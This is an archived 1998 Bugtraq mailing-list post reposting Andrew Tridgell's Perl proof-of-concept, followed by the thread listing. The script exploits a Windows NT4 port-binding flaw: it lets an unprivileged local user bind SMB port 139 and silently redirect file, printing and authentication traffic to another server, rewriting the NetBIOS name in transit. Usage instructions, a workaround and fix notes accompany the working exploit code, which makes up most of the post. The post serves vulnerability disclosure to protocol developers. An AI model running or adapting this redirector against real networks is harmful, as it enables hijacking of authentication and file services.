Bugtraq mailing list archives
SMB redirect program for NT
From: weld () L0PHT COM (Weld Pond)
Date: Tue, 10 Feb 1998 21:45:41 -0500
This program uses the NT port binding vulnerability to redirect a machine's SMB services to another machine. It was posted by Andrew Tridgell <tridge () SAMBA ANU EDU AU> on the Common Internet File System <CIFS () DISCUSS MICROSOFT COM> mailing list. The full message and the thread surrounding it is available via the web at: http://discuss.microsoft.com/SCRIPTS/WA-MSD.EXE?A2=ind9802b&L=cifs&P=738 -weld #!/usr/bin/perl # This script demonstrates a major security problem with # Windows NT4. It is based on an earlier script (paul.pl) that # demonstrated a problem with a protocol change that Microsoft # proposed. The change in this script takes advantage of a security # hole pointed out by L0pht (http://www.l0pht.com/). # What this script does is allow any unprivileged user on a NT Server # to redirect the local SMB services to any other SMB server which they # have an IP address for. This allows the user to redirect file, # printer and authentication services to another server. This has # enormous consequences for security. # This script was written by Andrew Tridgell and is being sent to # the CIFS discussion list so that CIFS developers become aware # of this problem. It should be noted that the L0pht announcement # (which predates this script) already provided an example command # using netcat to achieve the same thing so this script does # not actually offer malicious hackers anything more than what has # already been widely distributed. I wrote this example so that # the consequences would become clear to the people who are # in a position to do something about fixing the problem. # USAGE: # To use this script install perl5 then run the command # perl redirect.pl <localip> <remoteip> # for example # perl redirect.pl 192.168.2.13 192.168.2.10 # this would redirect any SMB connections made to the local # server (whose IP address is 192.168.2.13) to the remote # server 192.168.2.10. Any browsing, file access, authentication # requests or printing done to the local server by SMB clients # will be redirected to the remote server. # WORKAROUND: # There is no immediate fix to this security problem yet available. A # workaround is to disable local login access to non-trusted users. # This can be achieved using the "User Manager For Domains". At many # sites this will be an acceptable solution because NT servers are # often used only for remote file and printer services and do not # really need to offer the ability for users to run arbitrary programs # FIX: # A proper fix will require a patch from Microsoft. Hopefully they will # either implement privileged ports or they will get the socket # options correct on all their servers so such bind() tricks are # not possible. use IO::Socket; use IO::Select; if ($#ARGV != 1) { print "Usage: redirect.pl <localip> <remoteip>\n"; exit 0; } my $local = $ARGV[0]; my $target = $ARGV[1]; my $smbport = "139"; my $Msg; # this is a *SMBSERVER netbios name my $netbname = "CKFDENECFDEFFCFGEFFCCACACACACACA"; print "setting up redirection from $local to $target ...\n"; # Create a local socket $sock1 = new IO::Socket::INET(LocalAddr=>$local,LocalPort=>$smbport, Proto=>'tcp',Listen=>5,Reuse=>1); while (1) { print "listening on $local\n"; # Accept a connection $IS = $sock1->accept() || die; # Open a socket to the remote host $OS = new IO::Socket::INET(PeerAddr=>$target,PeerPort=>$smbport,Proto=>'tcp') || die; print "connected to $target\n"; # Create a read set for select() $rs = new IO::Select(); $rs->add($IS,$OS); $first = 1; $finished = 0; while(! $finished) { ($r_ready) = IO::Select->select($rs,undef,undef,undef); foreach $i (@$r_ready) { $o = $OS if $i == $IS; $o = $IS if $i == $OS; recv($i,$Msg,8192,0); if (! length $Msg) { $finished = 1; break; } if ($first && substr($Msg,0,1) eq "\x81") { print "replacing called name\n"; $msg2 = join('',substr($Msg,0,5),$netbname,substr($Msg,37,length($Msg)-37)); send($o,$msg2,0); $first = 0; } else { if ($i == $OS) { $Msg =~ s/Paul/Oops/mg;} send($o,$Msg,0); } } } # loop back to the top again }
Current thread:
- Re: www-sql cgi prog overrides .htaccess restrictions., (continued)
- Re: www-sql cgi prog overrides .htaccess restrictions. Stunt Pope (Feb 09)
- SNI-24: IDS Vulnerabilities Secure Networks Inc. (Feb 09)
- AIX/Gradient iFOR/LS bug: follows symlinks Joerg Schumacher (Feb 09)
- Re: AIX/Gradient iFOR/LS bug: follows symlinks Troy A. Bollinger (Feb 09)
- CFP - Recent Advances in Intrusion Detection (RAID'98) Marc Dacier (Feb 10)
- IBM-ERS Security Vulnerability Alert: IBM AIX: Insecure temporary ibm-ers () ERS IBM COM (Feb 10)
- Re: Another ld-linux.so problem Roman Drahtmueller (Feb 08)
- ld confusion Aleph One (Feb 10)
- Re: ld confusion Cristian Gafton (Feb 11)
- Sun Security Bulletin #00162 Howie (Feb 10)
- SMB redirect program for NT Weld Pond (Feb 10)
- Re: SMB redirect program for NT David LeBlanc (Feb 10)
- WIngate: the sequel Alans other account (Feb 10)
- [Workaround]The third SunOS4.1.4 tmpfs bug YAMAMORI Takenori (Feb 10)
- Re: SMB redirect program for NT Theo de Raadt (Feb 10)
- IBM-ERS Security Vulnerability Alert: IBM AIX: Telnet denial of ibm-ers () ERS IBM COM (Feb 11)